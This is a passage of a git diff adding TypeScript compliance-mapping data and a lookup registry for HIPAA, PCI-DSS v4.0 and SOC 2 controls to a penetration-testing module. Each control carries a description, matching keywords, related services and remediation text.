+    name: "Transmission Security",
+    description: "Implement technical measures to guard against unauthorized access during transmission",
+    priority: "critical",
+    keywords: ["transmission", "encryption", "tls", "ssl", "network", "transit"],
+    services: ["https", "ssh", "sftp", "tls"],
+    severities: ["critical", "high"],
+    remediation: "Encrypt all ePHI in transit",
+  },
+  {
+    id: "164.312(e)(2)(i)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Integrity Controls",
+    description: "Implement security measures to ensure ePHI is not improperly modified in transit",
+    priority: "high",
+    keywords: ["integrity", "transmission", "modification", "tampering"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "164.312(e)(2)(ii)",
+    framework: "hipaa",
+    category: "technical",
+    name: "Encryption",
+    description: "Implement mechanism to encrypt ePHI when appropriate",
+    priority: "critical",
+    keywords: ["encryption", "plaintext", "cleartext", "unencrypted"],
+    services: ["telnet", "ftp", "http"],
+    severities: ["critical", "high"],
+    remediation: "Encrypt all ePHI transmissions",
+  },
+
+  // Organizational Requirements
+  {
+    id: "164.314(a)(1)",
+    framework: "hipaa",
+    category: "organizational",
+    name: "Business Associate Contracts",
+    description: "Business associate contract must contain required elements",
+    priority: "high",
+    keywords: ["business associate", "baa", "contract", "third party"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.316(a)",
+    framework: "hipaa",
+    category: "policies",
+    name: "Policies and Procedures",
+    description: "Implement reasonable and appropriate policies and procedures",
+    priority: "high",
+    keywords: ["policy", "procedure", "documentation"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.316(b)(1)",
+    framework: "hipaa",
+    category: "policies",
+    name: "Documentation",
+    description: "Maintain written policies, procedures, and actions required by the Rule",
+    priority: "medium",
+    keywords: ["documentation", "written", "record", "policy"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "164.316(b)(2)(i)",
+    framework: "hipaa",
+    category: "policies",
+    name: "Documentation Retention",
+    description: "Retain documentation for six years from creation or last effective date",
+    priority: "medium",
+    keywords: ["retention", "six years", "documentation", "record"],
+    services: [],
+    severities: [],
+  },
+]
diff --git a/packages/opencode/src/pentest/compliance/frameworks/index.ts b/packages/opencode/src/pentest/compliance/frameworks/index.ts
new file mode 100644
index 00000000000..9d52cc52b8e
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/frameworks/index.ts
@@ -0,0 +1,112 @@
+/**
+ * @fileoverview Compliance Framework Registry
+ *
+ * Central registry for all compliance frameworks and their controls.
+ *
+ * @module pentest/compliance/frameworks
+ */
+
+import type { ComplianceTypes } from "../types"
+import { PCI_DSS_FRAMEWORK, PCI_DSS_CONTROLS } from "./pci-dss"
+import { HIPAA_FRAMEWORK, HIPAA_CONTROLS } from "./hipaa"
+import { SOC2_FRAMEWORK, SOC2_CONTROLS } from "./soc2"
+
+/**
+ * Registry of all compliance frameworks.
+ */
+const FRAMEWORKS: Record<ComplianceTypes.FrameworkId, ComplianceTypes.Framework> = {
+  "pci-dss": PCI_DSS_FRAMEWORK,
+  hipaa: HIPAA_FRAMEWORK,
+  soc2: SOC2_FRAMEWORK,
+}
+
+/**
+ * Registry of controls by framework.
+ */
+const CONTROLS: Record<ComplianceTypes.FrameworkId, ComplianceTypes.ComplianceControl[]> = {
+  "pci-dss": PCI_DSS_CONTROLS,
+  hipaa: HIPAA_CONTROLS,
+  soc2: SOC2_CONTROLS,
+}
+
+export namespace ComplianceFrameworks {
+  /**
+   * List all available frameworks.
+   */
+  export function list(): ComplianceTypes.Framework[] {
+    return Object.values(FRAMEWORKS)
+  }
+
+  /**
+   * Get a specific framework by ID.
+   */
+  export function get(id: ComplianceTypes.FrameworkId): ComplianceTypes.Framework | undefined {
+    return FRAMEWORKS[id]
+  }
+
+  /**
+   * Get all controls for a framework.
+   */
+  export function getControls(frameworkId: ComplianceTypes.FrameworkId): ComplianceTypes.ComplianceControl[] {
+    return CONTROLS[frameworkId] || []
+  }
+
+  /**
+   * Get controls by category within a framework.
+   */
+  export function getControlsByCategory(
+    frameworkId: ComplianceTypes.FrameworkId,
+    categoryId: string
+  ): ComplianceTypes.ComplianceControl[] {
+    const controls = CONTROLS[frameworkId] || []
+    return controls.filter((c) => c.category === categoryId)
+  }
+
+  /**
+   * Get categories for a framework.
+   */
+  export function getCategories(frameworkId: ComplianceTypes.FrameworkId): ComplianceTypes.Framework["categories"] {
+    const framework = FRAMEWORKS[frameworkId]
+    return framework?.categories || []
+  }
+
+  /**
+   * Get a specific control by ID.
+   */
+  export function getControl(
+    frameworkId: ComplianceTypes.FrameworkId,
+    controlId: string
+  ): ComplianceTypes.ComplianceControl | undefined {
+    const controls = CONTROLS[frameworkId] || []
+    return controls.find((c) => c.id === controlId)
+  }
+
+  /**
+   * Search controls across all frameworks by keyword.
+   */
+  export function searchControls(query: string): ComplianceTypes.ComplianceControl[] {
+    const queryLower = query.toLowerCase()
+    const results: ComplianceTypes.ComplianceControl[] = []
+
+    for (const controls of Object.values(CONTROLS)) {
+      for (const control of controls) {
+        if (
+          control.name.toLowerCase().includes(queryLower) ||
+          control.description.toLowerCase().includes(queryLower) ||
+          control.keywords.some((k) => k.toLowerCase().includes(queryLower))
+        ) {
+          results.push(control)
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Get total control count across all frameworks.
+   */
+  export function getTotalControlCount(): number {
+    return Object.values(CONTROLS).reduce((sum, controls) => sum + controls.length, 0)
+  }
+}
diff --git a/packages/opencode/src/pentest/compliance/frameworks/pci-dss.ts b/packages/opencode/src/pentest/compliance/frameworks/pci-dss.ts
new file mode 100644
index 00000000000..e201c7cf68e
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/frameworks/pci-dss.ts
@@ -0,0 +1,627 @@
+/**
+ * @fileoverview PCI-DSS v4.0 Controls
+ *
+ * Payment Card Industry Data Security Standard controls for compliance mapping.
+ *
+ * @module pentest/compliance/frameworks/pci-dss
+ */
+
+import type { ComplianceTypes } from "../types"
+
+export const PCI_DSS_FRAMEWORK: ComplianceTypes.Framework = {
+  id: "pci-dss",
+  name: "PCI-DSS",
+  version: "4.0",
+  description: "Payment Card Industry Data Security Standard - Requirements for organizations handling cardholder data",
+  categories: [
+    { id: "1", name: "Network Security Controls", description: "Install and maintain network security controls" },
+    { id: "2", name: "Secure Configurations", description: "Apply secure configurations to all system components" },
+    { id: "3", name: "Protect Account Data", description: "Protect stored account data" },
+    { id: "4", name: "Encryption in Transit", description: "Protect cardholder data with strong cryptography during transmission" },
+    { id: "5", name: "Malware Protection", description: "Protect all systems and networks from malicious software" },
+    { id: "6", name: "Secure Development", description: "Develop and maintain secure systems and software" },
+    { id: "7", name: "Access Control", description: "Restrict access to system components and cardholder data" },
+    { id: "8", name: "User Identification", description: "Identify users and authenticate access to system components" },
+    { id: "9", name: "Physical Security", description: "Restrict physical access to cardholder data" },
+    { id: "10", name: "Logging & Monitoring", description: "Log and monitor all access to system components and cardholder data" },
+    { id: "11", name: "Security Testing", description: "Test security of systems and networks regularly" },
+    { id: "12", name: "Security Policies", description: "Support information security with organizational policies and programs" },
+  ],
+  controlCount: 64,
+}
+
+export const PCI_DSS_CONTROLS: ComplianceTypes.ComplianceControl[] = [
+  // Requirement 1: Network Security Controls
+  {
+    id: "1.2.1",
+    framework: "pci-dss",
+    category: "1",
+    name: "Firewall Configuration",
+    description: "Configuration standards for firewalls are defined, documented, and kept current",
+    priority: "high",
+    keywords: ["firewall", "acl", "access control list", "network security", "iptables", "nftables"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+    remediation: "Define and document firewall rules, review configurations quarterly",
+  },
+  {
+    id: "1.2.4",
+    framework: "pci-dss",
+    category: "1",
+    name: "Accurate Network Diagram",
+    description: "Accurate network diagrams are maintained that show all connections between CDE and other networks",
+    priority: "medium",
+    keywords: ["network diagram", "topology", "cde", "cardholder data environment"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "1.3.1",
+    framework: "pci-dss",
+    category: "1",
+    name: "Inbound Traffic Restricted",
+    description: "Inbound traffic to the CDE is restricted to only necessary traffic",
+    priority: "critical",
+    keywords: ["inbound", "ingress", "traffic", "exposed", "internet-facing", "public"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Restrict inbound traffic to only necessary services and ports",
+  },
+  {
+    id: "1.3.2",
+    framework: "pci-dss",
+    category: "1",
+    name: "Outbound Traffic Restricted",
+    description: "Outbound traffic from the CDE is restricted to only authorized traffic",
+    priority: "high",
+    keywords: ["outbound", "egress", "exfiltration"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "1.4.1",
+    framework: "pci-dss",
+    category: "1",
+    name: "NSC Between Trusted/Untrusted",
+    description: "NSCs are implemented between trusted and untrusted networks",
+    priority: "critical",
+    keywords: ["dmz", "segmentation", "untrusted", "perimeter"],
+    services: [],
+    severities: ["critical", "high"],
+  },
+
+  // Requirement 2: Secure Configurations
+  {
+    id: "2.2.1",
+    framework: "pci-dss",
+    category: "2",
+    name: "Configuration Standards",
+    description: "Configuration standards are developed for all system components",
+    priority: "high",
+    keywords: ["configuration", "hardening", "baseline", "standard"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "2.2.2",
+    framework: "pci-dss",
+    category: "2",
+    name: "Vendor Default Accounts",
+    description: "Vendor default accounts are managed",
+    priority: "critical",
+    keywords: ["default", "vendor", "account", "password", "credential", "factory"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Change or disable all vendor default accounts and passwords",
+  },
+  {
+    id: "2.2.4",
+    framework: "pci-dss",
+    category: "2",
+    name: "Unnecessary Services Disabled",
+    description: "Only necessary services, protocols, daemons are enabled",
+    priority: "high",
+    keywords: ["unnecessary", "service", "daemon", "protocol", "unused"],
+    services: ["telnet", "ftp", "rsh", "rlogin", "finger"],
+    severities: ["high", "medium"],
+    remediation: "Disable all unnecessary services and remove unused software",
+  },
+  {
+    id: "2.2.5",
+    framework: "pci-dss",
+    category: "2",
+    name: "Insecure Services Secured",
+    description: "If any insecure services are present, they are secured",
+    priority: "high",
+    keywords: ["insecure", "plaintext", "unencrypted", "cleartext"],
+    services: ["telnet", "ftp", "http", "rsh", "rlogin"],
+    severities: ["high", "medium"],
+    remediation: "Replace insecure services with secure alternatives (SSH, SFTP, HTTPS)",
+  },
+  {
+    id: "2.2.7",
+    framework: "pci-dss",
+    category: "2",
+    name: "Non-Console Access Encrypted",
+    description: "All non-console administrative access is encrypted",
+    priority: "high",
+    keywords: ["admin", "administrative", "console", "encryption", "remote access"],
+    services: ["ssh", "rdp", "vnc"],
+    severities: ["high", "medium"],
+    remediation: "Ensure all remote administrative access uses encryption (SSH, HTTPS)",
+  },
+
+  // Requirement 3: Protect Account Data
+  {
+    id: "3.2.1",
+    framework: "pci-dss",
+    category: "3",
+    name: "Data Retention Minimized",
+    description: "Account data storage is kept to a minimum",
+    priority: "high",
+    keywords: ["retention", "storage", "minimize", "purge", "delete"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "3.3.1",
+    framework: "pci-dss",
+    category: "3",
+    name: "SAD Not Stored",
+    description: "SAD is not stored after authorization",
+    priority: "critical",
+    keywords: ["sad", "sensitive authentication data", "cvv", "pin", "magnetic stripe", "track data"],
+    services: [],
+    severities: ["critical"],
+    remediation: "Never store sensitive authentication data after authorization",
+  },
+  {
+    id: "3.5.1",
+    framework: "pci-dss",
+    category: "3",
+    name: "PAN Rendered Unreadable",
+    description: "PAN is rendered unreadable anywhere it is stored",
+    priority: "critical",
+    keywords: ["pan", "primary account number", "encryption", "mask", "truncate", "hash"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Encrypt, mask, or truncate PANs in storage",
+  },
+
+  // Requirement 4: Encryption in Transit
+  {
+    id: "4.2.1",
+    framework: "pci-dss",
+    category: "4",
+    name: "Strong Cryptography for Transmission",
+    description: "Strong cryptography is used during transmission of cardholder data",
+    priority: "critical",
+    keywords: ["tls", "ssl", "encryption", "transit", "transmission", "https", "sftp"],
+    services: ["https", "ssh", "sftp"],
+    severities: ["critical", "high"],
+    remediation: "Use TLS 1.2+ for all cardholder data transmission",
+  },
+  {
+    id: "4.2.1.1",
+    framework: "pci-dss",
+    category: "4",
+    name: "Trusted Keys and Certificates",
+    description: "Certificates used for PAN transmissions are confirmed as valid and not expired",
+    priority: "high",
+    keywords: ["certificate", "ssl", "tls", "expir", "valid", "trusted"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement certificate management and monitor for expiration",
+  },
+  {
+    id: "4.2.2",
+    framework: "pci-dss",
+    category: "4",
+    name: "PAN Secured in End-User Messaging",
+    description: "PAN is secured when sent via end-user messaging technologies",
+    priority: "high",
+    keywords: ["email", "messaging", "sms", "pan", "plaintext"],
+    services: [],
+    severities: ["critical", "high"],
+  },
+
+  // Requirement 5: Malware Protection
+  {
+    id: "5.2.1",
+    framework: "pci-dss",
+    category: "5",
+    name: "Anti-Malware Deployed",
+    description: "Anti-malware solution is deployed on all applicable systems",
+    priority: "high",
+    keywords: ["antivirus", "anti-malware", "malware", "virus", "endpoint protection"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "5.2.3",
+    framework: "pci-dss",
+    category: "5",
+    name: "Anti-Malware Active",
+    description: "Anti-malware mechanisms are actively running and cannot be disabled",
+    priority: "high",
+    keywords: ["antivirus", "anti-malware", "disabled", "inactive", "stopped"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "5.3.1",
+    framework: "pci-dss",
+    category: "5",
+    name: "Anti-Malware Updated",
+    description: "Anti-malware mechanisms and definitions are kept current",
+    priority: "medium",
+    keywords: ["update", "signature", "definition", "outdated"],
+    services: [],
+    severities: ["medium"],
+  },
+
+  // Requirement 6: Secure Development
+  {
+    id: "6.2.1",
+    framework: "pci-dss",
+    category: "6",
+    name: "Software Development Processes",
+    description: "Bespoke and custom software is developed securely",
+    priority: "high",
+    keywords: ["sdlc", "development", "secure coding", "software"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "6.2.4",
+    framework: "pci-dss",
+    category: "6",
+    name: "Common Vulnerabilities Addressed",
+    description: "Software engineering techniques prevent common vulnerabilities",
+    priority: "critical",
+    keywords: ["injection", "xss", "csrf", "sqli", "sql injection", "cross-site", "owasp"],
+    cweIds: [79, 89, 352, 78, 94, 22],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Address OWASP Top 10 vulnerabilities in custom software",
+  },
+  {
+    id: "6.3.1",
+    framework: "pci-dss",
+    category: "6",
+    name: "Security Vulnerabilities Identified",
+    description: "Security vulnerabilities are identified and addressed",
+    priority: "critical",
+    keywords: ["vulnerability", "cve", "patch", "security update", "remediation"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+    remediation: "Implement vulnerability management process",
+  },
+  {
+    id: "6.3.3",
+    framework: "pci-dss",
+    category: "6",
+    name: "Critical Patches Installed",
+    description: "Critical security patches are installed within one month of release",
+    priority: "critical",
+    keywords: ["patch", "update", "security", "critical", "hotfix"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Install critical security patches within 30 days",
+  },
+  {
+    id: "6.4.1",
+    framework: "pci-dss",
+    category: "6",
+    name: "Public Web App Protection",
+    description: "Public-facing web applications are protected against attacks",
+    priority: "critical",
+    keywords: ["waf", "web application firewall", "web app", "public-facing"],
+    services: ["http", "https"],
+    severities: ["critical", "high"],
+    remediation: "Deploy WAF or conduct application security assessments",
+  },
+
+  // Requirement 7: Access Control
+  {
+    id: "7.2.1",
+    framework: "pci-dss",
+    category: "7",
+    name: "Access Control Model",
+    description: "Access control model is defined and applied",
+    priority: "high",
+    keywords: ["access control", "rbac", "least privilege", "need-to-know"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "7.2.2",
+    framework: "pci-dss",
+    category: "7",
+    name: "Privileges Assigned Based on Job",
+    description: "Access is assigned based on job classification and function",
+    priority: "high",
+    keywords: ["privilege", "role", "job function", "access rights"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "7.2.5",
+    framework: "pci-dss",
+    category: "7",
+    name: "Application Account Access Limited",
+    description: "Application and system accounts have access limited to minimum necessary",
+    priority: "high",
+    keywords: ["service account", "application account", "system account", "privilege"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+
+  // Requirement 8: User Identification
+  {
+    id: "8.2.1",
+    framework: "pci-dss",
+    category: "8",
+    name: "Unique User IDs",
+    description: "All users are assigned a unique ID",
+    priority: "high",
+    keywords: ["unique id", "user id", "shared account", "generic account"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Ensure all users have unique identifiers",
+  },
+  {
+    id: "8.2.2",
+    framework: "pci-dss",
+    category: "8",
+    name: "Shared Accounts Not Used",
+    description: "Group, shared, or generic accounts are not used",
+    priority: "high",
+    keywords: ["shared", "generic", "group", "common", "guest"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "8.3.1",
+    framework: "pci-dss",
+    category: "8",
+    name: "Strong Authentication",
+    description: "Strong authentication for users and admins is implemented",
+    priority: "critical",
+    keywords: ["authentication", "mfa", "2fa", "multi-factor", "password", "strong"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement MFA for all administrative access",
+  },
+  {
+    id: "8.3.4",
+    framework: "pci-dss",
+    category: "8",
+    name: "Invalid Auth Attempts Limited",
+    description: "Invalid authentication attempts are limited",
+    priority: "high",
+    keywords: ["lockout", "brute force", "login attempt", "failed authentication"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Lock accounts after 6 invalid attempts",
+  },
+  {
+    id: "8.3.6",
+    framework: "pci-dss",
+    category: "8",
+    name: "Password Complexity",
+    description: "Passwords meet minimum complexity requirements",
+    priority: "high",
+    keywords: ["password", "complexity", "strength", "weak password"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Require passwords of at least 12 characters with complexity",
+  },
+  {
+    id: "8.3.9",
+    framework: "pci-dss",
+    category: "8",
+    name: "Password History",
+    description: "Passwords cannot match any of the last four passwords",
+    priority: "medium",
+    keywords: ["password history", "reuse", "previous password"],
+    services: [],
+    severities: ["medium"],
+  },
+  {
+    id: "8.4.1",
+    framework: "pci-dss",
+    category: "8",
+    name: "MFA for CDE Access",
+    description: "MFA is implemented for all access into the CDE",
+    priority: "critical",
+    keywords: ["mfa", "multi-factor", "2fa", "two-factor", "cde"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement MFA for all CDE access",
+  },
+
+  // Requirement 10: Logging & Monitoring
+  {
+    id: "10.2.1",
+    framework: "pci-dss",
+    category: "10",
+    name: "Audit Logs Enabled",
+    description: "Audit logs are enabled and active for all system components",
+    priority: "high",
+    keywords: ["audit", "log", "logging", "audit trail"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "10.2.1.1",
+    framework: "pci-dss",
+    category: "10",
+    name: "User Access Logged",
+    description: "All individual user access to cardholder data is logged",
+    priority: "high",
+    keywords: ["user access", "log", "audit", "cardholder"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "10.2.1.2",
+    framework: "pci-dss",
+    category: "10",
+    name: "Admin Actions Logged",
+    description: "All actions taken by individuals with admin privileges are logged",
+    priority: "critical",
+    keywords: ["admin", "root", "privileged", "sudo", "administrator"],
+    services: [],
+    severities: ["critical", "high"],
+  },
+  {
+    id: "10.2.1.5",
+    framework: "pci-dss",
+    category: "10",
+    name: "Auth Attempts Logged",
+    description: "All invalid authentication attempts are logged",
+    priority: "high",
+    keywords: ["authentication", "login", "failed", "invalid", "attempt"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "10.3.1",
+    framework: "pci-dss",
+    category: "10",
+    name: "Log Review",
+    description: "Audit logs are reviewed at least once daily",
+    priority: "high",
+    keywords: ["log review", "monitoring", "siem", "analysis"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "10.5.1",
+    framework: "pci-dss",
+    category: "10",
+    name: "Log History Retained",
+    description: "Audit log history is retained for at least 12 months",
+    priority: "medium",
+    keywords: ["retention", "archive", "history", "12 months"],
+    services: [],
+    severities: ["medium"],
+  },
+
+  // Requirement 11: Security Testing
+  {
+    id: "11.2.1",
+    framework: "pci-dss",
+    category: "11",
+    name: "Wireless AP Detection",
+    description: "Authorized and unauthorized wireless access points are managed",
+    priority: "medium",
+    keywords: ["wireless", "wifi", "access point", "rogue", "unauthorized"],
+    services: [],
+    severities: ["medium"],
+  },
+  {
+    id: "11.3.1",
+    framework: "pci-dss",
+    category: "11",
+    name: "Internal Vulnerability Scans",
+    description: "Internal vulnerability scans are performed at least quarterly",
+    priority: "high",
+    keywords: ["vulnerability scan", "internal", "quarterly", "assessment"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Perform quarterly internal vulnerability scans",
+  },
+  {
+    id: "11.3.2",
+    framework: "pci-dss",
+    category: "11",
+    name: "External Vulnerability Scans",
+    description: "External vulnerability scans are performed at least quarterly",
+    priority: "high",
+    keywords: ["vulnerability scan", "external", "asv", "quarterly"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "11.4.1",
+    framework: "pci-dss",
+    category: "11",
+    name: "Penetration Testing",
+    description: "External and internal penetration testing is performed regularly",
+    priority: "critical",
+    keywords: ["penetration test", "pentest", "red team", "security assessment"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Perform annual penetration testing and after significant changes",
+  },
+  {
+    id: "11.5.1",
+    framework: "pci-dss",
+    category: "11",
+    name: "IDS/IPS Deployed",
+    description: "Network intrusion detection/prevention is in place",
+    priority: "high",
+    keywords: ["ids", "ips", "intrusion detection", "intrusion prevention", "network monitoring"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "11.5.2",
+    framework: "pci-dss",
+    category: "11",
+    name: "Change Detection Mechanism",
+    description: "Change detection mechanism is deployed to detect unauthorized changes",
+    priority: "high",
+    keywords: ["fim", "file integrity", "change detection", "tripwire"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+
+  // Requirement 12: Security Policies
+  {
+    id: "12.1.1",
+    framework: "pci-dss",
+    category: "12",
+    name: "Security Policy Established",
+    description: "Overall information security policy is established and maintained",
+    priority: "high",
+    keywords: ["security policy", "information security", "governance"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "12.3.1",
+    framework: "pci-dss",
+    category: "12",
+    name: "Risk Assessment",
+    description: "Risk assessment is performed at least annually",
+    priority: "high",
+    keywords: ["risk assessment", "risk analysis", "threat assessment"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "12.6.1",
+    framework: "pci-dss",
+    category: "12",
+    name: "Security Awareness Training",
+    description: "Security awareness program is implemented",
+    priority: "medium",
+    keywords: ["awareness", "training", "education", "phishing"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "12.10.1",
+    framework: "pci-dss",
+    category: "12",
+    name: "Incident Response Plan",
+    description: "Incident response plan exists and is ready to be activated",
+    priority: "high",
+    keywords: ["incident response", "ir", "breach", "security incident"],
+    services: [],
+    severities: [],
+  },
+]
diff --git a/packages/opencode/src/pentest/compliance/frameworks/soc2.ts b/packages/opencode/src/pentest/compliance/frameworks/soc2.ts
new file mode 100644
index 00000000000..63868d13f83
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/frameworks/soc2.ts
@@ -0,0 +1,410 @@
+/**
+ * @fileoverview SOC 2 Controls
+ *
+ * Service Organization Control 2 Trust Service Criteria for compliance mapping.
+ *
+ * @module pentest/compliance/frameworks/soc2
+ */
+
+import type { ComplianceTypes } from "../types"
+
+export const SOC2_FRAMEWORK: ComplianceTypes.Framework = {
+  id: "soc2",
+  name: "SOC 2",
+  version: "2024",
+  description: "Service Organization Control 2 - Trust Service Criteria for service organizations",
+  categories: [
+    { id: "CC", name: "Common Criteria", description: "Foundation controls applicable to all TSCs" },
+    { id: "A", name: "Availability", description: "System availability for operation and use" },
+    { id: "PI", name: "Processing Integrity", description: "System processing is complete, accurate, timely" },
+    { id: "C", name: "Confidentiality", description: "Information designated as confidential is protected" },
+    { id: "P", name: "Privacy", description: "Personal information is collected, used, retained appropriately" },
+  ],
+  controlCount: 33,
+}
+
+export const SOC2_CONTROLS: ComplianceTypes.ComplianceControl[] = [
+  // Common Criteria (CC) - Security
+  {
+    id: "CC1.1",
+    framework: "soc2",
+    category: "CC",
+    name: "COSO Principle 1: Integrity and Ethics",
+    description: "Organization demonstrates commitment to integrity and ethical values",
+    priority: "high",
+    keywords: ["ethics", "integrity", "code of conduct", "values"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC1.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Board Oversight",
+    description: "Board exercises oversight of development and performance of internal control",
+    priority: "medium",
+    keywords: ["governance", "board", "oversight", "management"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC2.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Information Communication",
+    description: "Organization internally communicates information necessary to support objectives",
+    priority: "medium",
+    keywords: ["communication", "information", "internal", "policy"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC3.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Risk Assessment",
+    description: "Entity specifies objectives and identifies risks to achievement of objectives",
+    priority: "high",
+    keywords: ["risk assessment", "objectives", "risk identification"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+    remediation: "Perform regular risk assessments",
+  },
+  {
+    id: "CC3.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Risk Identification",
+    description: "Entity identifies risks to achievement of objectives across the entity",
+    priority: "high",
+    keywords: ["risk", "threat", "vulnerability", "identification"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+  },
+  {
+    id: "CC3.4",
+    framework: "soc2",
+    category: "CC",
+    name: "Change Management",
+    description: "Entity identifies and assesses changes that could significantly impact controls",
+    priority: "high",
+    keywords: ["change management", "change control", "modification"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC4.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Monitoring Activities",
+    description: "Entity selects and develops monitoring activities",
+    priority: "high",
+    keywords: ["monitoring", "audit", "review", "surveillance"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement continuous monitoring controls",
+  },
+  {
+    id: "CC4.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Deficiency Evaluation",
+    description: "Entity evaluates and communicates internal control deficiencies timely",
+    priority: "high",
+    keywords: ["deficiency", "finding", "remediation", "evaluation"],
+    services: [],
+    severities: ["critical", "high"],
+  },
+  {
+    id: "CC5.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Control Activities",
+    description: "Entity selects and develops control activities to mitigate risks",
+    priority: "high",
+    keywords: ["control", "mitigation", "security control"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+  },
+  {
+    id: "CC5.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Technology General Controls",
+    description: "Entity selects and develops general control activities over technology",
+    priority: "critical",
+    keywords: ["technology", "it controls", "general controls"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+    remediation: "Implement IT general controls",
+  },
+  {
+    id: "CC5.3",
+    framework: "soc2",
+    category: "CC",
+    name: "Policy Deployment",
+    description: "Entity deploys control activities through policies and procedures",
+    priority: "high",
+    keywords: ["policy", "procedure", "deployment", "implementation"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC6.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Logical Access Security",
+    description: "Entity implements logical access security software and infrastructure",
+    priority: "critical",
+    keywords: ["access control", "authentication", "authorization", "identity"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement role-based access controls",
+  },
+  {
+    id: "CC6.2",
+    framework: "soc2",
+    category: "CC",
+    name: "User Registration",
+    description: "Prior to issuing credentials, entity registers and authorizes new users",
+    priority: "high",
+    keywords: ["registration", "provisioning", "user account", "onboarding"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "CC6.3",
+    framework: "soc2",
+    category: "CC",
+    name: "Access Removal",
+    description: "Entity removes access to protected information when no longer needed",
+    priority: "high",
+    keywords: ["deprovisioning", "access removal", "termination", "revocation"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement timely access revocation procedures",
+  },
+  {
+    id: "CC6.4",
+    framework: "soc2",
+    category: "CC",
+    name: "Physical Access Restrictions",
+    description: "Entity restricts physical access to facilities and assets",
+    priority: "high",
+    keywords: ["physical access", "facility", "data center", "physical security"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC6.5",
+    framework: "soc2",
+    category: "CC",
+    name: "Disposal Protection",
+    description: "Entity discontinues logical and physical protections over assets when disposed",
+    priority: "high",
+    keywords: ["disposal", "sanitization", "destruction", "decommission"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "CC6.6",
+    framework: "soc2",
+    category: "CC",
+    name: "External Threats Protection",
+    description: "Entity implements controls to prevent or detect unauthorized software",
+    priority: "critical",
+    keywords: ["malware", "antivirus", "threat", "unauthorized software"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Deploy anti-malware solutions",
+  },
+  {
+    id: "CC6.7",
+    framework: "soc2",
+    category: "CC",
+    name: "Transmission Protection",
+    description: "Entity restricts transmission, movement, and removal of information",
+    priority: "critical",
+    keywords: ["transmission", "encryption", "data transfer", "network"],
+    services: ["https", "ssh", "sftp", "tls"],
+    severities: ["critical", "high"],
+    remediation: "Encrypt data in transit",
+  },
+  {
+    id: "CC6.8",
+    framework: "soc2",
+    category: "CC",
+    name: "Intrusion Detection",
+    description: "Entity implements controls to detect security events",
+    priority: "high",
+    keywords: ["detection", "ids", "ips", "intrusion", "security event"],
+    services: [],
+    severities: ["high", "medium"],
+    remediation: "Implement intrusion detection systems",
+  },
